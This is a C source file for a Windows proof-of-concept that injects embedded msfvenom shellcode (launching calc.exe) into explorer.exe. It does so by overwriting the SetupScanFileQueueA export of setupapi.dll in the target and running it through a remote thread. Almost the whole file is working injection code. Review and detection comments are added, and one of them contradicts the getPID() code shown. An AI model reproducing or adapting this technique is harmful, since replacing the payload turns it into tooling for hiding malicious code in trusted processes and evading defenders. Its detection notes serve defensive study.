#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
//Replace explorer.exe with whatever process you want to target
#define TargetProc L"explorer.exe"
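/**
 * Looks up the process ID of the first running process whose image name
 * matches TargetProc (case-insensitive), using a Toolhelp process snapshot.
 *
 * @return The PID of the matching process, or 0 when no process matches or
 *         the snapshot could not be taken (a message is printed in the
 *         latter case). 0 is never a PID that OpenProcess accepts, so the
 *         caller can test the result directly instead of getting an
 *         EXIT_FAILURE value that looks like a real PID.
 */
DWORD getPID() {
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        // GetLastError() is a DWORD (unsigned long), so %lu matches the type.
        printf("[!] Failed to take snapshot. Exiting with error: %lu\n", GetLastError());
        return 0;
    }
    printf("[+] Snapshot taken successfully.\n");

    // Explicit W variants: szExeFile is compared against a wide string, so the
    // lookup must not depend on whether UNICODE is defined for this build.
    PROCESSENTRY32W pe32 = { 0 };
    pe32.dwSize = sizeof(pe32);

    DWORD pid = 0;
    // Process32FirstW fills the first entry; the original loop compared only
    // entries produced by Process32NextW and so skipped that one.
    for (BOOL ok = Process32FirstW(hSnapshot, &pe32); ok; ok = Process32NextW(hSnapshot, &pe32)) {
        if (_wcsicmp(pe32.szExeFile, TargetProc) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    // Single exit so the snapshot handle is released on every path (it was
    // leaked before, and the not-found path fell off the end without a value).
    CloseHandle(hSnapshot);
    return pid;
}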
/**
 * Entry point of the PoC: looks up the target process by name, resolves the
 * address of an exported function of setupapi.dll in this process, and then
 * overwrites that function inside the target process with the embedded
 * payload before starting a remote thread on it.
 *
 * Review notes (defects visible in this function):
 *  - The PID returned by getPID() is used without any validation.
 *  - hProcess is not closed on the error returns that follow OpenProcess.
 *  - NULL is used as an integer initializer/argument (oldprotect, TID and the
 *    dwStackSize argument of CreateRemoteThread); 0 is the correct value.
 *  - "%ld" is used for DWORD values (unsigned long); "%lu" matches the type.
 *  - The status messages hard-code "explorer.exe" instead of using TargetProc.
 *  - WaitForSingleObject's result is ignored and "executed successfully" is
 *    printed unconditionally.
 *
 * @return EXIT_SUCCESS when every step succeeded, EXIT_FAILURE otherwise.
 */
int main() {
    DWORD PID = getPID();
    // NOTE(review): getPID() returns EXIT_FAILURE (== 1) when the snapshot
    // fails and falls off the end without a value when nothing matches;
    // nothing here checks PID before it is handed to OpenProcess.
    printf("[+] Process ID of target process [%ws] is %ld\n", TargetProc, PID);
    //calc.exe shellcode generated using msfvenom
    // Declared from a string literal, so sizeof(shellcode) also counts the
    // trailing '\0'; that extra byte is written to the target along with the
    // payload.
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
    "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
    "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
    "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
    "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
    "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
    "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
    "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
    "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
    "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
    "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
    "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
    "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
    "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
    "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
    "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
    "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
    "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
    "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
    DWORD oldprotect = NULL;   // NULL used for an integer; should be 0
    DWORD TID = NULL;          // same; receives the remote thread id below
    //Our sacrificial DLL
    // The DLL is loaded into *this* process only; the export address resolved
    // below is then reused as an address inside the target. NOTE(review): that
    // only works if setupapi.dll is mapped at the same base in the target,
    // which the code never verifies — otherwise the protection change and
    // write below land on whatever happens to be at that address.
    HMODULE hModule = LoadLibraryA("setupapi.dll");
    if (hModule == NULL) {
        printf("[!] Failed to load [setupapi.dll]. Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Loaded [setupapi.dll] at\n\t\\----0x%p\n", hModule);
    //Target function()
    // The export whose code bytes are replaced by the payload. Its original
    // bytes are never saved or restored, so any later legitimate call to this
    // export inside the target executes the payload instead (host-process
    // stability risk).
    PVOID pAddress = GetProcAddress(hModule, "SetupScanFileQueueA");
    if (pAddress == NULL) {
        printf("[!] Failed to get the address of the target function [SetupScanFileQueueA]. Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Got the address of the target function [SetupScanFileQueueA]\n\t\\----0x%p\n", pAddress);
    // PROCESS_ALL_ACCESS on a foreign process is far more than the calls below
    // need; the message below hard-codes "explorer.exe" rather than TargetProc.
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (hProcess == NULL) {
        printf("[!] Failed to get an handle to the target process [explorer.exe]. Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Got an handle to the target process [explorer.exe].\n");
    // Detection note: a cross-process VirtualProtectEx that makes an
    // image-backed (module) page writable, followed by WriteProcessMemory
    // into that same page, is the call pair that endpoint telemetry commonly
    // keys on for this technique. Every early return from here on leaks
    // hProcess (reclaimed only because the process exits).
    if (!VirtualProtectEx(hProcess, pAddress, sizeof(shellcode), PAGE_READWRITE, &oldprotect)) {
        printf("[!] Failed to change the memory protection of target func address.\n[!] Can't write the shellcode into memory.\n[!] Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Changed the memory protection to PAGE_READWRITE.\n");
    // Fixed delay between steps; its purpose is not stated in the source.
    Sleep(480);
    printf("[*] Attempting to write shellcode into target func address.\n");
    if (!WriteProcessMemory(hProcess, pAddress, shellcode, sizeof(shellcode), NULL)) {
        printf("[!] Failed to write shellcode into target address. Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Shellcode written into target address\n\t\\----0x%p\n", pAddress);
    // Leaves a writable+executable image-backed page in the target for the
    // rest of its lifetime — a durable artifact that memory scanners flag.
    if (!VirtualProtectEx(hProcess, pAddress, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldprotect)) {
        printf("[!] Failed to change the memory protection to executable.\n[!] Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Changed the memory protection to PAGE_EXECUTE_READWRITE.\n");
    // Second argument is dwStackSize (SIZE_T); NULL is the wrong kind of
    // constant there, 0 is intended. Detection note: the start address is an
    // export of a loaded module, so the thread looks module-backed on its own;
    // correlating it with the preceding protection change and write on the
    // same address is what distinguishes it from a benign remote thread.
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)pAddress, NULL, 0, &TID);
    if (hThread == NULL) {
        printf("[!] Failed to create remote thread for shellcode execution. Exiting with error: %ld\n", GetLastError());
        return EXIT_FAILURE;
    }
    printf("[+] Thread created for execution. TID: %ld\n", TID);
    // Return value not checked; the success message below is printed even if
    // the wait failed.
    WaitForSingleObject(hThread, INFINITE);
    printf("[+] Shellcode executed successfully.\n");
    Sleep(480);
    printf("[*] Cleaning up...\n");
    // Only the handles are released here; the target keeps the modified,
    // executable page and hModule stays loaded in this process until exit.
    CloseHandle(hProcess);
    CloseHandle(hThread);
    return EXIT_SUCCESS;
}